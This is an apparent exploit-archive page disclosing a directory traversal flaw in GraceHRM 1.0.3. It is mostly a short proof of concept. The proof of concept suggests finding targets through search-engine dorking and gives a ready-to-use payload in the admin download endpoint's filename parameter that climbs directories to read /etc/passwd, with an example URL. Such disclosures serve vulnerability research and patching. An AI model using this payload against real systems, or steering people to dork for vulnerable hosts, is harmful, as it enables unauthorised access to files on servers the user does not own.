Headline
GraceHRM 1.0.3 Directory Traversal
GraceHRM version 1.0.3 suffers from a directory traversal vulnerability.
GraceHRM 1.0.3 Directory Traversal
Posted Aug 24, 2023
Authored by indoushka
GraceHRM version 1.0.3 suffers from a directory traversal vulnerability.
tags | exploit, file inclusion
SHA-256 | 1ef7aca42ba692fa60907a0530d21ee9db579bba9acd7d508271bcf4d6e8171a
Download | Favorite | View
GraceHRM 1.0.3 Directory Traversal
====================================================================================================================================| # Title : GraceHRM v1.0.3 Directory traversal Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | | # Vendor : http://p30vel.ir/ | ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /admin/download?type=files&filename=../../../../../../../../../etc/passwd[+] http://127.0.0.1/hrmgraceitltdcom/admin/download?type=files&filename=../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |=======================================================================================================================================
File Tags
- ActiveX (932)
- Advisory (82,010)
- Arbitrary (16,214)
- BBS (2,859)
- Bypass (1,740)
- CGI (1,026)
- Code Execution (7,282)
- Conference (679)
- Cracker (841)
- CSRF (3,348)
- DoS (23,453)
- Encryption (2,370)
- Exploit (51,962)
- File Inclusion (4,223)
- File Upload (976)
- Firewall (821)
- Info Disclosure (2,785)
- Intrusion Detection (892)
- Java (3,045)
- JavaScript (859)
- Kernel (6,681)
- Local (14,456)
- Magazine (586)
- Overflow (12,693)
- Perl (1,423)
- PHP (5,149)
- Proof of Concept (2,338)
- Protocol (3,603)
- Python (1,535)
- Remote (30,803)
- Root (3,587)
- Rootkit (508)
- Ruby (612)
- Scanner (1,640)
- Security Tool (7,889)
- Shell (3,187)
- Shellcode (1,215)
- Sniffer (895)
- Spoof (2,207)
- SQL Injection (16,385)
- TCP (2,406)
- Trojan (687)
- UDP (893)
- Virus (665)
- Vulnerability (31,788)
- Web (9,670)
- Whitepaper (3,750)
- x86 (962)
- XSS (17,956)
- Other
File Archives
- August 2023
- July 2023
- June 2023
- May 2023
- April 2023
- March 2023
- February 2023
- January 2023
- December 2022
- November 2022
- October 2022
- September 2022
- Older
Systems
- AIX (428)
- Apple (2,002)
- BSD (373)
- CentOS (57)
- Cisco (1,925)
- Debian (6,819)
- Fedora (1,692)
- FreeBSD (1,244)
- Gentoo (4,322)
- HPUX (879)
- iOS (351)
- iPhone (108)
- IRIX (220)
- Juniper (67)
- Linux (46,508)
- Mac OS X (686)
- Mandriva (3,105)
- NetBSD (256)
- OpenBSD (485)
- RedHat (13,753)
- Slackware (941)
- Solaris (1,610)
- SUSE (1,444)
- Ubuntu (8,836)
- UNIX (9,292)
- UnixWare (186)
- Windows (6,575)
- Other